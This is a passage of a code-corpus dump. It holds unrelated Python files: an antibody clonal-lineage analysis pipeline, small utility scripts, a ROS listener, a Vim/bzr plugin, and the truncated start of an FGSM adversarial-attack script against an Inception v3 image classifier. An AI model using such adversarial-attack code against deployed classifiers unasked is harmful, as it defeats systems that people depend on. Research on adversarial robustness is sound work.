'showsequence=FALSE ymax=0.75 %s ' % (args.scriptdir,\n nuc_stat_errbar, nuc_PDF_errbar, cdrstring))\n\ndef Tree_clones(records, sample, args, sample_errbar=[]):\n ''' Parsing records and construct lineage Tree\n '''\n records_Dmask = records.copy()\n records_tree = records.copy()\n records_Dmask['Dmask_N'] = [seq.count('N') for seq in records['GERMLINE_IMGT_D_MASK']]\n records_Dmask['SEQUENCE_IMGT_LENGTH'] = records_Dmask['SEQUENCE_IMGT'].apply(len)\n records_Dmask.sort_values('Dmask_N', ascending=False, inplace=True)\n\n clone_seqlongest = {}\n for key, group in records_Dmask.groupby('CLONE'):\n # Use GERMLINE_IMGT_D_MASK with most 'N' as consensus one\n seq_Dmask = group['GERMLINE_IMGT_D_MASK'].values[0]\n records_tree.loc[records_tree['CLONE']==key, 'GERMLINE_IMGT_D_MASK'] = seq_Dmask\n\n # padding shorter SEQUENCE_IMGT to the longest length or trim it by the germline seq length\n seq_IMGT_longest = group['SEQUENCE_IMGT_LENGTH'].max()\n for index, row in group.iterrows():\n padding_length = seq_IMGT_longest - row['SEQUENCE_IMGT_LENGTH']\n SEQUENCE_ID = row['SEQUENCE_ID']\n SEQUENCE_IMGT = row['SEQUENCE_IMGT'] + 'N' * padding_length\n SEQUENCE_IMGT = SEQUENCE_IMGT[0:len(seq_Dmask)]\n records_tree.loc[records_tree['SEQUENCE_ID']==SEQUENCE_ID, 'SEQUENCE_IMGT'] = SEQUENCE_IMGT\n\n # Get lineage tree from collapsed records\n ### these two statements help find keyError\n # print(\"sample in treeClone =\",sample,file=sys.stderr)\n # print(\"have allcolumns before collapse?\", len(records_tree[\"SEQUENCE_INPUT\"]))\n records_collapse = collapse_db(records_tree, 'partial', 'F')\n records_collapse['DUPCOUNT'] = 1\n for index, row in records_collapse.iterrows():\n readlist = row['DUPREAD'].split(',')\n records_collapse.loc[index, 'DUPCOUNT'] = len(readlist)\n if sample != 'allsample':\n records_collapse.loc[index, 'SHORTCOUNT'] = 's1:%d' % len(readlist)\n records_collapse.loc[index, 'SAMPLECOUNT'] = '%s:%d' % (sample, len(readlist))\n else:\n sample_order = list(args.__dict__['sample_path'].keys())\n sample_num = len(sample_order)\n samples = [records[records['SEQUENCE_ID']==read]['SAMPLE'].item() for read in readlist]\n SAMPLECOUNT = '|'.join(['%s:%d' % (sample, samples.count(sample)) \\\n for sample in sample_order])\n SHORTCOUNT = '|'.join(['s%d:%d' % (i+1, samples.count(sample_order[i])) \\\n for i in range(0, sample_num)])\n records_collapse.loc[index, 'SAMPLECOUNT'] = SAMPLECOUNT\n records_collapse.loc[index, 'SHORTCOUNT'] = SHORTCOUNT\n records_collapse.sort_values('CLONE', ascending=True, inplace=True)\n\n select_Output = [\"SEQUENCE_ID\", \"V_CALL\", \"J_CALL\", \"CLONE\", \"SAMPLE\", \"DUPCOUNT\",\n \"SHORTCOUNT\", \"SAMPLECOUNT\", \"JUNCTION_LENGTH\", \"CDR3_SEQ\", \"SEQUENCE_IMGT\",\n \"GERMLINE_IMGT_D_MASK\"]\n records_Output = records_collapse[select_Output]\n file_collapse = \"%s/%s_clonal/s_clonal%s.collapse.xls\" % (args.outdir, sample, sample)\n records_Output.to_csv(file_collapse, sep=\"\\t\", index=False)\n\n if not args.skipTree:\n os.system('Rscript %s/HTGTSrep/R/TREEPlot.R %s %s/external_software/dnapars %d' % \\\n (args.scriptdir, file_collapse, args.scriptdir, args.min_profileread))\n\n # Generate mutation profile of clones using inferred seq as germline seq\n dirprefix = \"%s/%s_clonal\" % (args.outdir, sample)\n if sample != 'allsample':\n # For single sample, the inferred sequence is the root sequence in each clone\n for key, group in records_tree.groupby('CLONE'):\n treefile = \"%s/%s_clonal/lineageTree/%d.txt\" % (args.outdir, sample, key)\n if 
os.path.exists(treefile):\n inferseq = getInferSeq(treefile, group)\n V_ALLELE = group[\"V_ALLELE\"].unique()[0]\n nuc_stat = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.stat.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_profile = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_PDF = \"%s/nucl_profile_infer/clone%s.%s.%s.%s.%s.pdf\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n profile_DNAmut_clonal(inferseq, group, nuc_stat, nuc_PDF, nuc_profile, args)\n else:\n ''' For all pooled sample\n Folder _profile and _profile_errbar: V gene only profile and with error bar\n Folder _root: tree for each sample, root seq from all sample\n Folder _infer: tree for each sample, root seq from each sample's own seq\n Folder _errbar_infer: the root seq is the root in a clone with all pooled reads\n same as _root, so error bar can be added\n '''\n sample_list = list(args.__dict__['sample_path'].keys())\n short_list = [\"s%d\" % i for i in range(1, len(sample_list)+1)]\n for key, group_clone in records_tree.groupby('CLONE'):\n V_ALLELE = group_clone[\"V_ALLELE\"].unique()[0]\n sample_files = {}\n rootfile = \"%s/allsample_clonal/lineageTree/%d.txt\" % (args.outdir, key)\n if not os.path.exists(rootfile): continue\n rootseq = getInferSeq(rootfile, group_clone)\n\n for i in range(0, len(sample_list)):\n sample = sample_list[i]\n short = short_list[i]\n\n group = group_clone[group_clone['SAMPLE']==sample]\n if len(group) < args.min_profileread_sub: continue\n\n root_stat = \"%s/nucl_text_root/clone%s.%s.%s.%s.%s.stat.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n root_profile = \"%s/nucl_text_root/clone%s.%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n root_PDF = \"%s/nucl_profile_root/clone%s.%s.%s.%s.%s.pdf\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n profile_DNAmut_clonal(rootseq, group, root_stat, root_PDF, root_profile, args)\n sample_files[sample] = [root_PDF, root_stat]\n\n treefile = \"%s/allsample_clonal/lineageTree/%d.%s.txt\" % (args.outdir, key, short)\n if not os.path.exists(treefile): continue\n inferseq = getInferSeq(treefile, group)\n\n nuc_stat = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.stat.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_profile = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_PDF = \"%s/nucl_profile_infer/clone%s.%s.%s.%s.%s.pdf\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n profile_DNAmut_clonal(inferseq, group, nuc_stat, nuc_PDF, nuc_profile, args)\n\n # Run for the profile with error bar\n nuc_PDF_errbar = \"%s/nucl_profile_errbar_infer/clone%s.%s.%s.%s.errbar.pdf\" % (\n dirprefix, key, V_ALLELE, args.muttype, args.productivetype)\n nuc_stat_errbar = \"%s/nucl_text_errbar_infer/clone%s.%s.%s.%s.stat.errbar.txt\" % (\n dirprefix, key, V_ALLELE, args.muttype, args.productivetype)\n if len(sample_files) > 1:\n profile_DNAmut_clonal_errbar(rootseq, group_clone, nuc_stat_errbar, \\\n nuc_PDF_errbar, sample_files, args)\n\ndef series_analyze_onesample(records, sample, args):\n \"\"\"\n A series of analysis for each clone, including:\n 1. Define clones\n 2. DNA mutation profile\n 3. Amino Acid profile\n 4. Summarize clones\n 5. 
Lineage Tree construction\n \"\"\"\n ### 09162020 Lawrence: added print(...)\n # show the current sample\n print(\"current sample:\", sample, file=sys.stderr)\n # Define clones and write IgBlast Db files\n records = define_clones(records, args)\n outputfile = '%s/%s_clonal/%s.db_clone.xls' % (args.outdir, sample, sample)\n write_cloneDb(records, outputfile, args)\n\n # Generate mutation profile\n if not args.skipTree:\n Tree_clones(records, sample, args)\n\n # Generate AA profile\n for key, group in records.groupby('CLONE'):\n if len(group) >= args.min_profileread:\n DNAprofile_clones(group, sample, args, 'sepCluster')\n AAprofile_clones(group, sample, args)\n\n statfile = '%s/%s_clonal/%s.clone_stat.xls' % (args.outdir, sample, sample)\n clone_stat(records, statfile, 'sep', args)\n return records\n'''\n ###ADD CONSENSUS/AA DETAILS HERE!##################################################\n tempFile = '%s/%s_clonal/%s.clone_stat_temp.xls' % (args.outdir, sample, sample)\n scriptLocation = '%s/HTGTSrep/translate_consensus_Clonal.py' % (args.scriptdir) #may need to add %s/HTGTSrep/translate_consensus_clonal\n os.system(\"python3 {0} {1} > {2}\".format(scriptLocation, statfile, tempFile))\n os.system(\"mv {0} {1}\".format(tempFile, statfile))\n \n ###################################################################################\n'''\n\n\n# def selection_analyze():\n# os.system('Rscript %s/external_software/baseline/Baseline_Main_Version1.3.r' \\\n# '1 2 1 1 0 0 1:26:38:55:65:104 sample.fasta testfold test' % ())\n\ndef diversity_analyze(outputfile, args):\n '''\n Run Diversity.R to analyze diversity and abundance, required alakazam R package\n '''\n if not args.skipDiversity:\n os.system('Rscript %s/HTGTSrep/R/Diversity.R %s %s/allsample_clonal/allsample' % (\n args.scriptdir, outputfile, args.outdir))\n\ndef clone_stat(records, statfile, sampletype, args):\n '''\n Statistically summarize the reads in diff clones\n sampletype:\n mix: clones clustered of all sample reads\n sep: clones clustered of single sample reads\n '''\n statcols = ['CLONE', 'SAMPLE_NUM', 'READ_NUM', 'SAMPLE_DETAIL', 'SAMPLE_RATIO',\n 'V_ALLELE', 'D_ALLELE', 'J_ALLELE', 'JUNC_LEN', 'JUNC_NUM', 'JUNC_DETAIL']\n statDf = pd.DataFrame(columns=statcols)\n grouped = records.groupby('CLONE')\n for key, group in grouped:\n CLONE = group['CLONE'].values[0]\n SAMPLE_NUM = len(group['SAMPLE'].unique())\n READ_NUM = len(group)\n\n if sampletype == 'mix':\n sc = group['SAMPLE'].value_counts()\n SAMPLE_DETAIL = '|'.join(['%s:%d' % (sample, sc.get(sample, 0)) \\\n for sample in args.__dict__['sample_path']])\n SAMPLE_RATIO = '|'.join(['%s:%.4f' % (sample, float(sc.get(sample, 0))/len(records[records['SAMPLE']==sample])) \\\n for sample in args.__dict__['sample_path']])\n else:\n SAMPLE_DETAIL = group['SAMPLE'].values[0]\n SAMPLE_RATIO = 1\n V_ALLELE = group[\"V_ALLELE\"].value_counts().keys()[0]\n D_ALLELE = group[\"D_ALLELE\"].value_counts().keys()[0]\n J_ALLELE = group[\"J_ALLELE\"].values[0]\n JUNC_LEN = len(group['CDR3_SEQ'].values[0])\n JUNC_NUM = len(group['CDR3_SEQ'].unique())\n\n junc_count = group['CDR3_SEQ'].value_counts()\n JUNC_DETAIL = '|'.join(['%s:%d' % (junc, junc_count[junc]) \\\n for junc in group['CDR3_SEQ'].unique()])\n\n statDf.loc[len(statDf)+1] = [CLONE, SAMPLE_NUM, READ_NUM, SAMPLE_DETAIL, SAMPLE_RATIO,\n V_ALLELE, D_ALLELE, J_ALLELE, JUNC_LEN, JUNC_NUM, JUNC_DETAIL]\n\n if sampletype == 'sep': statDf.drop('SAMPLE_RATIO', inplace=True, axis=1)\n statDf.to_csv(statfile, sep=\"\\t\", index=False)\n\ndef 
series_analyze_allsample(records, samplelist, args):\n ''' Series analyze of pooled samples\n '''\n records.CLONE = records.SAMPLE + '.' + records.CLONE.map(str)\n outputfile = '%s/allsample_clonal/allsample.sep_clone.xls' % (args.outdir)\n records.to_csv(outputfile, sep=\"\\t\", index=False)\n\n # Do diversity/abundance analysis using clones clustered within each sample\n diversity_analyze(outputfile, args)\n\n # Do clonal clustering of all sample reads\n records.drop('CLONE', inplace=True, axis=1)\n records = define_clones(records, args)\n outputfile = '%s/allsample_clonal/allsample.mix_clone.xls' % (args.outdir)\n records.to_csv(outputfile, sep=\"\\t\", index=False)\n \n # Generate mutation profile for each sample\n for key, group in records.groupby('CLONE'):\n sample_errbar = []\n # key is each clone\n # group is df\n for sample, subgroup in group.groupby('SAMPLE'):\n ### args.min_profileread_sub = 10\n if len(subgroup) >= args.min_profileread_sub:\n sample_errbar.append(sample)\n DNAprofile_clones(subgroup, sample, args, 'mixCluster')\n if len(group) >= args.min_profileread:\n # Gen all sample profile & with err bar\n DNAprofile_clones(group, \"allsample\", args, 'mixCluster')\n AAprofile_clones(group, \"allsample\", args)\n if len(sample_errbar) > 1:\n DNAprofile_clones_errbar(group, sample_errbar, args)\n\n statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)\n clone_stat(records, statfile, 'mix', args)\n #########CREATE MASTER TLX HERE ################\n masterstatfile = '%s/allsample_clonal/allsample.master.mix_clone.stat.xls' % (args.outdir)\n #tempFile = '%s/%s_clonal/%s.clone_stat_temp.xls' % (args.outdir, sample, sample)#\n listSamples = \"\"\n for sample in samplelist:\n clonestatfile = '%s/%s_clonal/%s.clone_stat.xls' % (args.outdir, sample, sample)\n listSamples += clonestatfile + \" \"\n print(\"samplelist=\",samplelist, file = sys.stderr)\n\n ##create master xls\n scriptLocation = '%s/HTGTSrep/junctionsPerLibs.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} {2} > {3}\".format(scriptLocation, statfile, listSamples, masterstatfile)) ###junctionsperlibs\n \n ###create lib detail file\n libdetailfile = '%s/allsample_clonal/allsample.lib_detail.xls' % (args.outdir)\n libScript = '%s/HTGTSrep/libConsensus_clonal.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} > {2}\".format(libScript, masterstatfile, libdetailfile))\n \n ###order information in master file\n tempMaster = '%s/allsample_clonal/allsample.master_temp.mix_clone.stat.xls' % (args.outdir)\n orderlibScript = '%s/HTGTSrep/orderLibDetail.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} > {2}\".format(orderlibScript, masterstatfile, tempMaster))\n os.system(\"mv {0} {1}\".format(tempMaster, masterstatfile))\n \n ###add sample ration and sort 6/11\n addRatioScript = '%s/HTGTSrep/add_sampleratio_sort.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} {2}\".format(addRatioScript, statfile, listSamples))\n #print(\"COMMAND: python3 \"+addRatioScript+\" \"+statfile+\" \"+listSamples)\n \n ##Screen 6/11\n screenScript = '%s/HTGTSrep/screen_master_stat.py' % (args.scriptdir)\n screenoutputfile = '%s/allsample_clonal/%s.master.mix_clone.stat_screen.xls' % (args.outdir, args.outdir)\n os.system(\"python3 {0} {1} > {2}\".format(screenScript, masterstatfile, screenoutputfile))\n \n \n ###clean up files\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.master.mix_clone.stat.xls' % (args.outdir), '%s/allsample_clonal/%s.master.mix_clone.stat.xls' % (args.outdir, args.outdir)))\n 
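# Aside: a toy, self-contained version of the per-clone / per-sample tallying that
# clone_stat() above performs; the frame and the sample names below are synthetic.
import pandas as pd

toy = pd.DataFrame({
    'CLONE': [1, 1, 1, 2, 2],
    'SAMPLE': ['s1', 's1', 's2', 's1', 's2'],
})
for clone, group in toy.groupby('CLONE'):
    counts = group['SAMPLE'].value_counts()
    detail = '|'.join('%s:%d' % (s, counts.get(s, 0)) for s in ['s1', 's2'])
    print(clone, len(group), detail)  # e.g. "1 3 s1:2|s2:1"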
os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.lib_detail.xls' % (args.outdir), '%s/allsample_clonal/%s.lib_detail.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir), '%s/allsample_clonal/%s.mix_clone.stat.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.mix_clone.xls' % (args.outdir), '%s/allsample_clonal/%s.mix_clone.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.sep_clone.xls' % (args.outdir), '%s/allsample_clonal/%s.sep_clone.xls' % (args.outdir, args.outdir)))\n\n\n # Generate stat file for shared clones\n ### TEHSE HAbr BEEN GENERATED ABOVE SO THESE TWO LINES ARE COMMENTED OUT\n # statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)\n # clone_stat(records, statfile, 'mix', args)\n\n # Generate lineage Tree\n if not args.skipTree:\n Tree_clones(records, 'allsample', args, sample_errbar)\n\ndef clonal_main(args):\n logging.info('Loading reads database')\n # Collapse reads\n sample_path = args.__dict__['sample_path']\n pool = multiprocessing.Pool(processes = len(sample_path))\n results = []\n for sample in sample_path:\n path = sample_path[sample]\n dbpath = path + '/%s.db.xls' % sample\n records = pd.read_csv(dbpath, sep=\"\\t\")\n print(\"initial records file\", dbpath, file=sys.stderr)\n # Filter records using V coverage, CDR3 length, whether 'N' in CDR3\n records = records.loc[records['V_COVERAGE'] > args.min_Vcov, ]\n records[\"JUNCTION_LENGTH\"] = records.CDR3_SEQ.map(len)\n records = records.loc[records['JUNCTION_LENGTH'] > 1, ]\n records = records.loc[records['SEQUENCE_IMGT'] != '-', ]\n\n records['SAMPLE'] = sample\n records['CDR3_MASK'] = [re.sub('[\\.-]', 'N', seq) for seq in records.CDR3_SEQ]\n\n if args.skipCDR3withN:\n records = records[~records['CDR3_MASK'].str.contains(\"N\")]\n\n if args.muttype == 'MutOnly':\n records = records.loc[records['V_MUTATION'] > 0, ]\n elif args.muttype == 'noMut':\n records = records.loc[records['V_MUTATION'] == 0, ]\n if args.productivetype == 'P':\n records = records.loc[records['PRODUCTIVE'] == 'T', ]\n elif args.productivetype == 'NP':\n records = records.loc[records['PRODUCTIVE'] == 'F', ]\n # Run series analysis with multiprocessing result = series_analyze_onesample(records, sample, args)\n # print(\"mid loop: sample is\", sample, file=sys.stderr)\n result = pool.apply_async(series_analyze_onesample, (records, sample, args,))\n # print(\"result.get()\",result.get(),file=sys.stderr)\n results.append(result)\n pool.close()\n pool.join()\n\n # Analysis in all samples\n #print(\"frame: results=\",results, file = sys.stderr)\n ### frame: results= [<multiprocessing.pool.ApplyResult object at 0x7fe95d9d13d0>, ....,]\n frames = [result.get() for result in results]\n records_allsample = pd.concat(frames, ignore_index=True)\n series_analyze_allsample(records_allsample, sample_path.keys(), args)\n","sub_path":"HTGTSrep/HTGTSrep/clonal.py","file_name":"clonal.py","file_ext":"py","file_size_in_byte":26740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"585383700","text":"#coding=utf-8\n\n#Created by Alfred Jiang 20150514\n\n\nimport sys\nimport os\nimport json\n\niosnotebook_project_url = \"https://github.com/viktyz/iosnotebook/blob/master/\"\n\nlist = []\n\n#获取脚本文件的当前路径\ndef current_file_dir():\n\n path = sys.path[0]\n\n if os.path.isdir(path):\n\n return 
path\n\n elif os.path.isfile(path):\n\n return os.path.dirname(path)\n\ndef parse_file(filepath, filename):\n\n url_string = iosnotebook_project_url\n\n if str(filename).startswith('Note_'):\n\n url_string = url_string + 'Notes/' + filename\n\n elif str(filename).startswith('JavaScript_'):\n\n url_string = url_string + 'JavaScript/' + filename\n\n elif str(filename).startswith('Python_'):\n\n url_string = url_string + 'Python/' + filename\n\n else:\n\n return\n\n\n file = open(filepath + '/' + filename, 'r')\n\n is_name_section = False\n is_tag_section = False\n is_session_section = False\n\n name_string = ''\n tag_string = ''\n session_string = ''\n\n for linenum, line in enumerate(file.readlines()):\n\n if len(str(line).strip('\\n')) == 0:\n\n continue\n\n if '### 方案名称' in line:\n\n is_name_section = True\n is_tag_section = False\n is_session_section = False\n\n continue\n\n if '### 关键字' in line:\n\n is_name_section = False\n is_tag_section = True\n is_session_section = False\n\n continue\n\n if '### 需求场景' in line:\n\n is_name_section = False\n is_tag_section = False\n is_session_section = True\n\n continue\n\n if '### 参考链接' in line:\n\n is_name_section = False\n is_tag_section = False\n is_session_section = False\n\n break\n\n if is_name_section == True and len(str(line).strip('\\n')) != 0 :\n\n name_string = name_string + str(line).strip('\\n')\n\n if is_tag_section == True and len(str(line).strip('\\n')) != 0:\n\n tag_string = tag_string + str(line).strip('\\n')\n\n if is_session_section == True and len(str(line).strip('\\n')) != 0:\n\n session_string = session_string + str(line).strip('\\n')\n\n info = dict()\n\n info['title'] = name_string\n info['category'] = session_string\n info['tags'] = tag_string\n info['url'] = url_string\n info['date'] = ''\n\n list.append(info)\n\ndef get_file_from_dir(dir,callback):\n\n for root,dirs,files in os.walk(dir):\n\n for item in files:\n\n extension = os.path.splitext(item)[1][1:]\n\n callback(root, item)\n\n# 主函数\ndef main():\n\n get_file_from_dir(current_file_dir(), parse_file)\n\n json.dump(list, open(r'Other/search.json', 'w'),ensure_ascii=False, indent=1)\n\nif __name__ == '__main__':\n main()","sub_path":"md_to_search_json.py","file_name":"md_to_search_json.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102907493","text":"#!/usr/bin/env python\nimport rospy\n\nimport geometry_msgs\nimport std_msgs\nimport numpy as np\nimport message_filters\nfrom learning_tf.msg import Network\nfrom std_msgs.msg import Int16MultiArray\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import PoseStamped\nfrom tf.transformations import euler_from_quaternion\nfrom message_filters import TimeSynchronizer, Subscriber\n\nglobal txrx_pl\nglobal txrx_td\nglobal roll\nglobal pitch\nglobal yaw\nglobal x\nglobal y\nglobal z\nglobal linear_vel\nglobal angular_vel\n\ndef gotimage(txrx, pose):\n print(\"Attempting to synch\")\n print(\"success\")\n txrx_pl = txrx.packet_loss\n txrx_td = txrx.time_delay\n x = pose.pose.position.x\n y = pose.pose.position.y\n z = pose.pose.position.z\n quaternion = (\n pose.pose.orientation.x,\n pose.pose.orientation.y,\n pose.pose.orientation.z,\n pose.pose.orientation.w)\n euler = euler_from_quaternion(quaternion)\n roll = euler[0]\n pitch = euler[1]\n yaw = euler[2]\n\n print(\"Packet Loss: %s, Time Delay: %s, Roll: %s, Pitch: %s, Yaw: %s\" % (txrx_pl, txrx_td, roll, pitch, yaw))\n\nrospy.init_node('GetData', 
anonymous=True)\nnetwork_sub = message_filters.Subscriber(\"/network_stats\", Network)\npose_sub = message_filters.Subscriber(\"/lilbot_3BA615/pose_152\", PoseStamped)\n#image_sub = Subscriber(\"/wide_stereo/left/image_rect_color\", sensor_msgs.msg.Image)\n#camera_sub = Subscriber(\"/wide_stereo/left/camera_info\", sensor_msgs.msg.CameraInfo)\n\nats = TimeSynchronizer([network_sub, pose_sub], 10)\nats.registerCallback(gotimage)\nrospy.spin()\n","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"299794325","text":"def coverPoints(A, B):\n steps = 0\n for i in range(1, len(A)):\n steps += max(abs(A[i] - A[i - 1]), abs(B[i] - B[i - 1]))\n return steps\n\n\ndef main():\n steps = coverPoints([1, 2, 3, 4], [3, 5, 7, 1])\n print(\"Minimum no of steps taken to cover the points in 2d grid\", steps)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"min_steps_infinite_grid.py","file_name":"min_steps_infinite_grid.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"333293431","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom bonaparticle import core\nfrom bonaparticle.tasks import task, images\nfrom sys import argv\nfrom os.path import isfile\n\n\n\n\nDEFAULT_MASTER_FILE = 'Master.tex'\n\n\n# Create a new BonapartechnicalEditor instance\neditor = core.BonapartechnicalEditor()\n\n# Assign a simple image conversion task to our newly created editor\neditor.assign_task(images.NaiveCompressionTask())\n\n\nif len(argv) > 1:\n file_name = argv[1]\n if isfile(file_name):\n editor.process(file_name)\n else:\n editor.error(\"\\n\" + file_name + \" doesn't exist\")\nelse:\n if isfile(DEFAULT_MASTER_FILE):\n editor.process(DEFAULT_MASTER_FILE)\n else:\n editor.error(\n \"\\nPlease supply \" + DEFAULT_MASTER_FILE + \" or another file name\"\n )\n","sub_path":"bin/bonaparticle.py","file_name":"bonaparticle.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39143026","text":"#\n# Copyright (C) 2009 Benoit Pierre <benoit.pierre@gmail.com>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
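# Aside: a quick check of the Chebyshev step count used by coverPoints() in the
# min_steps_infinite_grid.py record above: a walk that may also move diagonally
# needs max(|dx|, |dy|) steps between consecutive points.
def steps(ax, ay, bx, by):
    return max(abs(bx - ax), abs(by - ay))

assert steps(1, 3, 2, 5) == 2  # one diagonal move, then one vertical move
assert steps(2, 5, 3, 7) == 2
assert steps(3, 7, 4, 1) == 6  # matches the record's example total of 2 + 2 + 6 = 10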
If not, see <http://www.gnu.org/licenses/>.\n#\n\n\nfrom bzrstatus.complete import Complete\nfrom bzrstatus.output import Output\nfrom bzrstatus.ui import UI\n\nfrom StringIO import StringIO\n\nfrom bzrlib import commands, trace, ui, osutils, version_info\nfrom bzrlib.errors import (BzrError, NoWorkingTree)\nfrom bzrlib.workingtree import WorkingTree\n\nimport traceback\nimport shlex\nimport vim\nimport sys\nimport os\n\n\nvim_stdout = sys.stdout\nvim_stderr = sys.stderr\nuser_encoding = osutils.get_user_encoding()\n\n\nbzr_instances = {}\n\n\nclass Bzr:\n\n def __init__(self, path):\n\n if '/' == path[-1]:\n self.path = path[0:-1]\n else:\n self.path = path\n\n self.update()\n\n vim.command(\"let t:bzr_id='\" + str(id(self)) + \"'\")\n bzr_instances[id(self)] = self\n vim.command(\"let t:bzr_num=\" + str(len(bzr_instances)))\n\n def complete(self, cmdline, cursorpos):\n\n try:\n matches = Complete(cmdline, cursorpos, self.root).complete()\n except ValueError:\n matches = []\n e = sys.exc_info()[1]\n print >> sys.stderr, 'parse error:', e.message\n\n vim.command(\"let matches = ['\" + \"', '\".join(matches) + \"']\")\n\n def run(self, cmd, to_buffer=True, progress_updates=False):\n\n if type(cmd) is str:\n argv = shlex.split(cmd)\n else:\n argv = cmd\n\n if to_buffer:\n output = Output(progress_updates,\n vim.current.buffer,\n vim.current.window)\n else:\n output = StringIO()\n\n olddir = os.getcwd()\n os.chdir(self.root)\n\n try:\n sys.stdout = output\n sys.stderr = output\n\n trace.enable_default_logging()\n ui.ui_factory = UI(output)\n\n # Is this a final release version? If so, we should suppress warnings\n if version_info[3] == 'final':\n from bzrlib import symbol_versioning\n symbol_versioning.suppress_deprecation_warnings(override=False)\n\n new_argv = []\n try:\n # ensure all arguments are unicode strings\n for arg in argv:\n if isinstance(arg, unicode):\n new_argv.append(arg)\n else:\n new_argv.append(arg.decode(user_encoding))\n except UnicodeDecodeError:\n raise BzrError(\"argv should be list of unicode strings.\")\n argv = new_argv\n\n try:\n ret = commands.run_bzr_catch_errors(argv)\n except:\n print >>vim_stderr, StringIO(traceback.format_exc())\n ret = -1\n\n ui.ui_factory.finish()\n\n if not to_buffer:\n return output.getvalue()\n\n output.flush(redraw=False, final=True)\n\n vim.command(\"let b:bzrstatus_fileformat = '%s'\" %\n (output.fileformat))\n\n return ret\n\n finally:\n\n for handler in trace._bzr_logger.handlers:\n handler.close()\n if trace._trace_file is not None:\n trace._trace_file.close()\n trace._trace_file = None\n\n os.chdir(olddir)\n\n sys.stdout = vim_stdout\n sys.stderr = vim_stderr\n\n def update(self, update_file=False):\n\n self.tree = None\n self.root = self.path\n\n try:\n self.tree = WorkingTree.open_containing(self.path)[0]\n self.root = self.tree.basedir\n except NoWorkingTree:\n pass\n\n if update_file:\n self.update_file()\n\n def update_file(self):\n filename = '[BZR' + str(vim.eval('t:bzr_num')) + '] ' + self.root\n if self.tree is not None:\n filename += ' [' + self.tree.branch.nick + ']'\n vim.command(\"exe 'file '.fnameescape('\" + filename + \"')\")\n\n\ndef bzr():\n return bzr_instances[int(vim.eval('t:bzr_id'))]\n\n\n","sub_path":"lib/python/bzrstatus/bzr.py","file_name":"bzr.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157854636","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport 
tensorflow.contrib.slim.nets as nets\nfrom urllib.request import urlretrieve\nimport json\nimport matplotlib.pyplot as plt\nimport PIL\nimport numpy as np\nstep=16\nresult_file=str(step)+'_FGSM_attack.txt'\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='3'\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.InteractiveSession(config=config)\ny_hat = tf.placeholder(tf.int64, ())\nlabels = tf.one_hot(y_hat, 1000)\n\nx = tf.placeholder(tf.float32, (1, 299, 299, 3))\nx_rar = tf.placeholder(tf.float32, (1, 299, 299, 3))\nx_adv = tf.Variable(tf.zeros([1, 299, 299, 3]))\n\n_POOL_NAME = 'Mixed_7c'\n_POOL_SIZE = 8\n_MODEL_END = 'Logits'\n\n\ndef inception(image, reuse):\n preprocessed = tf.multiply(tf.subtract(image, 0.5), 2.0)\n arg_scope = nets.inception.inception_v3_arg_scope(weight_decay=0.0)\n with slim.arg_scope(arg_scope):\n logits, end_point = nets.inception.inception_v3(preprocessed, 1001, is_training=False, reuse=reuse)\n logits = logits[:, 1:] # ignore background class\n probs = 